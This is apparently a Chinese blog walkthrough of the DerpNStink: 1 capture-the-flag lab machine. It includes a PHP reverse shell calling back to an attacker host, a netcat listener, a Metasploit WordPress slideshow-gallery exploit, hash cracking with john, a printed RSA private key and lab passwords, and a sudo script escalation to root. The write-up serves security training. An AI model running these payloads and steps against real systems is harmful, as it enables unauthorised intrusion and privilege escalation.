DerpNStink: 1靶机攻略

DerpNStink: 1靶机攻略

各种扫描

  • 演示中靶机IP:192.168.88.129

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

#可进入的网页
http://192.168.88.129/
http://192.168.88.129/weblog/wp-admin/
http://192.168.88.129/weblog/
http://192.168.88.129/robots.txt
http://192.168.88.129/temporary/
http://192.168.88.129/php/phpmyadmin/

翻网页

  • 搜索到flag1

在这里插入图片描述

  • 浅浅试出了一个密码

在这里插入图片描述

  • 不是最新版本

在这里插入图片描述

  • 可以文件上传

在这里插入图片描述

  • phpmyadmin

在这里插入图片描述

企图建立连接

第一种:文件上传

  • 先在kali打开监听
nc -lvvp 8888
  • 利用之前找的上传入口上传
<?php
$sock = fsockopen('192.168.88.128',8888);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>

在这里插入图片描述

  • 连接成功

在这里插入图片描述

第二种:扫描漏洞

  • 使用WordPress漏洞扫描工具wpscan
wpscan --url http://derpnstink.local/weblog/

  • 发现问题
slideshow gallery

在这里插入图片描述

  • 找到攻击模块并使用
msfconsole
search slideshow gallery
use 0
set rhosts 192.168.88.129
set targeturi /weblog/
set wp_password admin
set wp_user admin
run

在这里插入图片描述

  • 连接成功

在这里插入图片描述

  • 进入shell

在这里插入图片描述

翻找文件

  • 有两个用户:
mrderp
stinky

在这里插入图片描述

  • 四处搜寻未果,想办法进入之前的数据库

  • /var/www/html/weblog页面找到博客配置文件wp-config.php

在这里插入图片描述

  • 发现数据库账户密码
root:mysql

在这里插入图片描述

进入数据库

在这里插入图片描述

在这里插入图片描述

  • 破解密码:–在/usr/share/wordlists/ 目录下有个rockyou压缩包,解压后可做为字典使用,比较大
john who --wordlist=../usr/share/wordlists/rockyou.txt
#指定字典破解
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41   #Unclestinky:wedgie57
$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/   #admin:admin
  • 启用终端,尝试登入
python -c "import pty;pty.spawn('/bin/bash')"
  • stinky尝试成功

在这里插入图片描述

翻用户文件

  • 找到一个key.txt

在这里插入图片描述

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
  • 一个.pcap文件

在这里插入图片描述

  • flag3

在这里插入图片描述

查看数据包文件

在这里插入图片描述

  • 找到密码 #找http中的post
mrderp:derpderpderpderpderpderpderp

sudo提权

在这里插入图片描述

  • 在指定目录里创建文件

在这里插入图片描述

mkdir 。。。
# 创建目录
echo '/bin/sh' > derpy.sh   
#也可以是"/bin/bash"等其他内容
chmod 777 derpy.sh
#赋权
sudo ./derpy.sh
#提权

注:

ssh -i key stinky@192.168.88.129 
#使用密钥登录  key即密钥文件
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值